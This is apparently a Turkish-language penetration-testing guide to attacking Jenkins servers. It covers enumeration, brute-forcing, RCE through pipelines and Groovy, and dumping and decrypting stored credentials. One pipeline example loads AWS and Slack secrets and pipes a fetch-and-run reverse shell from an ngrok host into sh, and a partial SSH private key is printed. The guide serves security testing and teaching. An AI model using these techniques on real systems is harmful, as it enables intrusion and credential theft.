Jenkins Security

Temel Bilgiler

Jenkins, herhangi bir programlama dili ve kaynak kodu deposu kombinasyonu için sürekli entegrasyon veya sürekli teslimat (CI/CD) ortamı oluşturmanın basit bir yöntemini sunan bir araçtır. Ayrıca, çeşitli rutin geliştirme görevlerini otomatikleştirir. Jenkins, bireysel adımlar için betikler oluşturma ihtiyacını ortadan kaldırmasa da, tüm derleme, test ve dağıtım araçları dizisini entegre etmenin daha hızlı ve daha sağlam bir yolunu sağlar.

Kimlik Doğrulamasız Sayım

Kimlik doğrulaması olmadan ilginç Jenkins sayfalarını aramak için (/people veya /asynchPeople, bu mevcut kullanıcıları listeler) şunları kullanabilirsiniz:

msf> use auxiliary/scanner/http/jenkins_enum

Kimlik doğrulaması gerektirmeden komutları çalıştırıp çalıştıramayacağınızı kontrol edin:

msf> use auxiliary/scanner/http/jenkins_command

Kredensiyalsiz olarak /asynchPeople/ yoluna veya /securityRealm/user/admin/search/index?q= yoluna bakarak kullanıcı adlarını görebilirsiniz.

Jenkins sürümünü /oops veya /error yolundan alabilirsiniz.

Bilinen Güvenlik Açıkları

Giriş

Temel bilgilerde Jenkins'e giriş yapmanın tüm yollarını kontrol edebilirsiniz:

Kayıt

Hesap oluşturmanıza ve içine giriş yapmanıza izin veren Jenkins örneklerini bulabileceksiniz. Bu kadar basit.

SSO Girişi

Ayrıca, SSO işlevselliği/eklentileri mevcutsa, bir test hesabı (yani, bir test Github/Bitbucket hesabı) kullanarak uygulamaya giriş yapmayı denemelisiniz. buradan hile yapın.

Bruteforce

Jenkins, şifre politikası ve kullanıcı adı brute-force önlemesi eksikliği vardır. Zayıf şifreler veya şifre olarak kullanıcı adları kullanılıyor olabileceğinden, kullanıcıları brute-force yapmak önemlidir; hatta tersine çevrilmiş kullanıcı adları şifre olarak da kullanılabilir.

msf> use auxiliary/scanner/http/jenkins_login

Şifre Spraying

Bu python scriptini veya bu powershell scriptini kullanın.

IP Beyaz Liste Bypass

Birçok organizasyon, SaaS tabanlı kaynak kontrol yönetimi (SCM) sistemleri olan GitHub veya GitLab'ı, Jenkins veya TeamCity gibi iç, kendi barındırdığı CI çözümleri ile birleştirir. Bu yapı, CI sistemlerinin SaaS kaynak kontrol sağlayıcılarından webhook olayları almasına olanak tanır, esasen pipeline işlerini tetiklemek için.

Bunu başarmak için, organizasyonlar SCM platformlarının IP aralıklarını beyaz listeye alır, böylece webhooklar aracılığıyla iç CI sistemine erişim izni verir. Ancak, herkesin GitHub veya GitLab'da bir hesap oluşturabileceğini ve bunu webhook tetiklemek için yapılandırabileceğini unutmamak önemlidir; bu da iç CI sistemine istek gönderebilir.

Kontrol edin: https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/

İç Jenkins Suistimalleri

Bu senaryolarda Jenkins'e erişmek için geçerli bir hesabınız olduğunu varsayacağız.

Daha fazla bilgi için temel bilgilere bakın:

Kullanıcıları Listeleme

Eğer Jenkins'e eriştiyseniz, http://127.0.0.1:8080/asynchPeople/ adresinde diğer kayıtlı kullanıcıları listeleyebilirsiniz.

Düz Metin Gizli Bilgileri Bulmak için Yapıları Dökme

Düz metin gizli bilgileri bulmak umuduyla yapı konsol çıktıları ve yapı ortam değişkenlerini dökmek için bu scripti kullanın.

python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v

SSH Kimlik Bilgilerini Çalma

Eğer ele geçirilen kullanıcı yeni bir Jenkins düğümü oluşturma/değiştirme için yeterli yetkiye sahipse ve diğer düğümlere erişim için SSH kimlik bilgileri zaten saklanıyorsa, bu kimlik bilgilerini çalabilir. Düğüm oluşturarak/değiştirerek ve kimlik bilgilerini kaydedecek bir ana bilgisayar ayarlayarak bunu gerçekleştirebilir, ana bilgisayar anahtarını doğrulamadan:

Jenkins ssh kimlik bilgilerini genellikle global sağlayıcıda (/credentials/) bulabilirsiniz, bu nedenle diğer gizli bilgileri dökme şeklinizle bunları da dökebilirsiniz. Daha fazla bilgi için Gizli Bilgileri Dökme Bölümü.

Jenkins'te RCE

Jenkins sunucusunda bir shell almak, saldırgana tüm gizli bilgileri ve env değişkenlerini sızdırma fırsatı verir ve aynı ağda bulunan diğer makineleri istismar etme veya hatta bulut kimlik bilgilerini toplama imkanı sağlar.

Varsayılan olarak, Jenkins SYSTEM olarak çalışır. Bu nedenle, onu ele geçirmek saldırgana SYSTEM ayrıcalıkları verecektir.

Proje Oluşturma/Düzenleme ile RCE

Proje oluşturma/düzenleme, Jenkins sunucusunda RCE elde etmenin bir yoludur:

Groovy Script Çalıştırarak RCE

Ayrıca, yeni bir proje oluşturmaktan daha gizli olabilecek bir Groovy script çalıştırarak RCE elde edebilirsiniz:

Pipeline Oluşturma/Düzenleme ile RCE

Ayrıca bir pipeline oluşturarak/düzenleyerek RCE elde edebilirsiniz:

Pipeline İstismarı

Pipeline'ları istismar etmek için hala Jenkins'e erişiminiz olması gerekir.

Build Pipeline'ları

Pipeline'lar, projelerde build mekanizması olarak da kullanılabilir. Bu durumda, pipeline sözdizimini içerecek depo içindeki bir dosya yapılandırılabilir. Varsayılan olarak /Jenkinsfile kullanılır:

Ayrıca, pipeline yapılandırma dosyalarını başka yerlerde (örneğin, diğer depolarda) saklamak da mümkündür; bu, depo erişimini ve pipeline erişimini ayırma amacı taşır.

Eğer bir saldırgan o dosya üzerinde yazma erişimine sahipse, onu değiştirebilir ve pipeline'ı tetikleyebilir. Hatta Jenkins'e erişimi olmadan bile. Saldırganın bazı dal korumalarını atlatması gerekebilir (platforma ve kullanıcı ayrıcalıklarına bağlı olarak bunlar atlatılabilir veya atlatılamayabilir).

Özel bir pipeline'ı çalıştırmak için en yaygın tetikleyiciler şunlardır:

• Ana dal için Pull request (veya potansiyel olarak diğer dallar için)

• Ana dala Push (veya potansiyel olarak diğer dallar için)

• Ana dalı güncelleyin ve bir şekilde çalıştırılmasını bekleyin

Pipeline RCE

Önceki RCE bölümünde, bir pipeline'ı değiştirerek RCE elde etme tekniği zaten belirtilmişti.

Env Değişkenlerini Kontrol Etme

Tüm pipeline için veya belirli aşamalar için düz metin env değişkenleri tanımlamak mümkündür. Bu env değişkenleri hassas bilgi içermemelidir, ancak bir saldırgan her zaman tüm pipeline yapılandırmalarını/Jenkinsfile'ları kontrol edebilir:

pipeline {
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {

Gizli bilgileri dökme

Jenkins'in gizli bilgileri genellikle nasıl ele aldığı hakkında bilgi için temel bilgilere göz atın:

Kimlik bilgileri küresel sağlayıcılara (/credentials/) veya belirli projelere (/job/<project-name>/configure) sınırlanabilir. Bu nedenle, hepsini dışarı aktarmak için gizli bilgileri içeren tüm projeleri en azından ele geçirmeniz ve özel/zehirli boru hatlarını çalıştırmanız gerekir.

Başka bir sorun var, bir boru hattının env'sinde bir gizli bilgi almak için gizli bilginin adını ve türünü bilmeniz gerekir. Örneğin, bir usernamePassword gizli bilgisini string gizli bilgisi olarak yüklemeye çalışırsanız bu hata ile karşılaşırsınız:

ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected

Burada bazı yaygın gizli türlerini yüklemenin yolu var:

withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
sh '''
env #Search for USERNAME and PASS
'''
}

withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
sh '''
env #Search for SECRET
'''
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
sh '''
env # Search for USERPASS
'''
}

# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
}

Sayfanın sonunda tüm kimlik bilgisi türlerini bulabilirsiniz: https://www.jenkins.io/doc/pipeline/steps/credentials-binding/

Tetikleyiciler

Belgelerden: triggers direktifi, Pipeline'ın otomatik olarak yeniden tetiklenmesi gereken yolları tanımlar. GitHub veya BitBucket gibi bir kaynakla entegre olan Pipelinelar için, triggers gerekli olmayabilir çünkü webhook tabanlı entegrasyon zaten mevcut olabilir. Mevcut tetikleyiciler cron, pollSCM ve upstream'dir.

Cron örneği:

triggers { cron('H */4 * * 1-5') }

Check diğer örnekleri belgelerde.

Düğümler & Ajanlar

Bir Jenkins örneği, farklı makinelerde çalışan farklı ajanlara sahip olabilir. Bir saldırgan perspektifinden, farklı makinelere erişim, çalıntı potansiyel bulut kimlik bilgileri veya diğer makineleri istismar etmek için kullanılabilecek farklı ağ erişimi anlamına gelir.

Daha fazla bilgi için temel bilgilere bakın:

Yapılandırılmış düğümleri /computer/ içinde listeleyebilirsiniz, genellikle Yerleşik Düğüm (Jenkins'i çalıştıran düğüm) ve potansiyel olarak daha fazlasını bulacaksınız:

Yerleşik düğümü ele geçirmek özellikle ilginçtir çünkü hassas Jenkins bilgilerini içerir.

Yerleşik Jenkins düğümünde pipeline'ı çalıştırmak istediğinizi belirtmek için pipeline içinde aşağıdaki yapılandırmayı belirtebilirsiniz:

pipeline {
agent {label 'built-in'}

Tam örnek

Belirli bir ajan içinde, bir cron tetikleyicisi ile, pipeline ve aşama ortam değişkenleri ile, bir adımda 2 değişken yükleyerek ve ters shell göndererek:

pipeline {
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}

post {
always {
cleanWs()
}
}
}

Keyfi Okuma ile RCE

RCE

İstismar Sonrası

Metasploit

msf> post/multi/gather/jenkins_gather

Jenkins Gizli Anahtarları

Yeterli izinleriniz varsa /credentials/ erişerek gizli anahtarları listeleyebilirsiniz. Bunun yalnızca credentials.xml dosyasındaki gizli anahtarları listeleyeceğini unutmayın, ancak build yapılandırma dosyaları da daha fazla gizli anahtar içerebilir.

Eğer her projenin yapılandırmasını görebiliyorsanız, orada depo erişimi için kullanılan gizli anahtarların (gizli anahtarlar) ve projenin diğer gizli anahtarlarının isimlerini de görebilirsiniz.

Groovy'den

Diskten

Bu dosyalar Jenkins gizli anahtarlarını şifre çözmek için gereklidir:

• secrets/master.key

• secrets/hudson.util.Secret

Böyle gizli anahtarlar genellikle şunlarda bulunabilir:

• credentials.xml

• jobs/.../build.xml

• jobs/.../config.xml

Onları bulmak için bir regex:

# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Print only the filenames where the secrets are located
grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"

# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>

Jenkins sırlarını çevrimdışı çöz

Eğer sırları çözmek için gereken şifreleri dökümlediyseniz, bu scripti kullanarak o sırları çözebilirsiniz. bu script

python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT

Groovy'den Jenkins sırlarını çözme

println(hudson.util.Secret.decrypt("{...}"))

Yeni admin kullanıcısı oluştur

1. /var/lib/jenkins/config.xml veya C:\Program Files (x86)\Jenkis\ içindeki Jenkins config.xml dosyasına erişin.

2. <useSecurity>true</useSecurity> kelimesini arayın ve true kelimesini false olarak değiştirin.

3. sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml

4. Jenkins sunucusunu yeniden başlatın: service jenkins restart

5. Şimdi Jenkins portalına tekrar gidin ve bu sefer Jenkins herhangi bir kimlik bilgisi istemeyecek. Yönetim Jenkins bölümüne giderek yönetici şifresini tekrar ayarlayın.

6. Ayarları <useSecurity>true</useSecurity> olarak değiştirerek güvenliği tekrar etkinleştirin ve Jenkins'i tekrar başlatın.

Referanslar

• https://github.com/gquere/pwn_jenkins

• https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/

• https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password

• https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html

• https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072

• https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3